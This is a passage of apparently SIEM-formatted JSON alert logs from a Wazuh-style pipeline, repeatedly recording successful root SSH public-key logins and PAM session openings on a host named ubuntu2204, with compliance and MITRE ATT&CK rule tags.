(uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense 